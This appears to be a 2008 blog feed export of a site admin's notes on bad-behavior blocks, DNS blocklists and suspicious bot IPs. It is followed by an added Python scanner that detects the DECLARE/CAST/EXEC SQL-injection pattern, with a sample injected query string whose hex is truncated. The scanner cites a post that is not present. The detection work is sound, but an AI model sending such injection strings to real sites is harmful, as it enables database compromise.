67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam<br />
67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam<br />
67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam<br />
67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam<br /><br /><br />
The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/<br />
It was added to the list: Tue Apr 1 12:41:39 2008 EST<br /><br />
spam source means the system was found via manual spam header parsing to be the origin of spam.<br /><br />
Update July 15th <br />
Agent: firefox/2.0.0.6 (ubuntu-feisty) <br />
72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com<br />
tmaster noreply@blogger.com 9<br /><br />
tag:blogger.com,1999:blog-33923218.post-4522603801355587183 2008-06-17T12:57:00.002-05:00 2008-06-17T13:08:59.180-05:00<br />
openrbl.org is gone<br />
openrbl.org is down and I need a replacement that can do a lookup on all of the block lists and do a DNS lookup. <br /><br />
I did find a replacement of sorts. 
Change the admin.php $dns_lookup setting to:<br /><br />
$dns_lookup ="http://www.robtex.com/rbl/";<br /><br />
If anyone knows of one, please post it.<br />
tmaster noreply@blogger.com 1<br /><br />
tag:blogger.com,1999:blog-33923218.post-1432536090658230359 2008-06-06T12:44:00.000-05:00 2008-06-06T12:44:28.865-05:00<br />
Request contained a malicious JavaScript or SQL injection attack<br />
bad-behavior is now blocking what it says is a SQL injection, but all it's really looking for is a # in the header. So I end up seeing crap like this.<br /><br />
I think this may be a bug in bad behavior.<br /><br />
Update: I am still seeing this from the Yahoo bot.<br /><br />
403 Request contained a malicious JavaScript or SQL injection attack <br />
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />
74.6.8.122 llf520018.crawl.yahoo.net <br /><br />
403 Request contained a malicious JavaScript or SQL injection attack <br />
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />
74.6.17.186 llf520164.crawl.yahoo.net <br /><br />
403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com <br />
Agent: Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />
74.6.22.159 llf520079.crawl.yahoo.net <br /><br />
 // Broken spambots send URLs with various invalid characters<br />
 // Some broken browsers send the #vector in the referer field :(<br />
 if (strpos($package['request_uri'], "#") !== FALSE) {<br />
 return "dfd9b1ad";<br />
 }<br />
tmaster noreply@blogger.com 0<br /><br />
tag:blogger.com,1999:blog-33923218.post-791666364698821003 2008-06-02T23:57:00.001-05:00 2008-06-03T00:01:00.953-05:00<br />
robot on pox1s.craigslist.org<br />
Why would craigslist.org be running a bot?<br /><br />
403 Required header 'Accept' missing <br />
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2 <br />
66.150.243.17 pox1s.craigslist.org<br />
tmaster noreply@blogger.com 1<br /><br />
tag:blogger.com,1999:blog-33923218.post-1945939022379728848 2008-06-01T18:08:00.002-05:00 2008-06-01T18:15:45.563-05:00<br />
barton.centeralnet.com bot<br />
Agent: -NO AGENT- <br />
216.32.80.66 barton.centeralnet.com <br /><br />
Some type of webhosting company in Iran<br />
tmaster noreply@blogger.com 0
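
For the DECLARE/CAST/EXEC requests described in the 2008-08-22 post above, this added example (not code from the blog, M&M Autoban or bad-behavior) scans access-log lines for the full statement shape after percent-decoding and counts hits per client IP. The log layout, IP addresses and paths are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Shape: DECLARE @v CHAR(n);SET @v=CAST(0x<hex> AS CHAR(n));EXEC(@v)
# Requiring the whole shape avoids hits on words such as "podcast".
INJECTION = re.compile(
    r"DECLARE\s+@(\w+)\s+N?(?:VAR)?CHAR\s*\(\s*\w+\s*\)\s*;\s*"
    r"SET\s+@\1\s*=\s*CAST\s*\(\s*0x([0-9A-F]*)[^)]*?\s+AS\s+N?(?:VAR)?CHAR"
    r".*?EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE | re.DOTALL,
)
# Assumed log layout: client IP first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def find_injection(target):
    """Return (variable name, decoded start of the hex blob) or None."""
    decoded = unquote_plus(target)  # path and query string are both checked
    match = INJECTION.search(decoded)
    if match is None:
        return None
    blob = match.group(2)
    blob = blob[: len(blob) // 2 * 2]  # bytes.fromhex needs whole bytes
    return match.group(1), bytes.fromhex(blob).decode("latin-1")


def scan(log_lines):
    """Count injection attempts per client IP."""
    hits = Counter()
    for line in log_lines:
        match = REQUEST.match(line)
        if match and find_injection(match.group(2)):
            hits[match.group(1)] += 1
    return hits


# The string quoted in the post, hex still truncated as the post shows it.
PAGE_STRING = ("DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----"
               "%20AS%20CHAR(4000));EXEC(@S);")
# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    f'192.0.2.10 - - [22/Aug/2008:22:40:01 -0500] "GET /a.asp?id=1;{PAGE_STRING} HTTP/1.1" 200 512',
    f'192.0.2.10 - - [22/Aug/2008:22:40:02 -0500] "GET /a.asp?id=2;{PAGE_STRING.lower()} HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Aug/2008:22:41:00 -0500] "GET /podcast/DECLARE-your-love.html HTTP/1.1" 200 900',
    '198.51.100.7 - - [22/Aug/2008:22:41:05 -0500] "GET /search?q=how+to+cast+a+spell HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for ip, count in scan(SAMPLE_LOG).items():
        print(ip, count)
```

The decoded prefix returned by `find_injection` lets you triage what the hex blob starts with without executing anything.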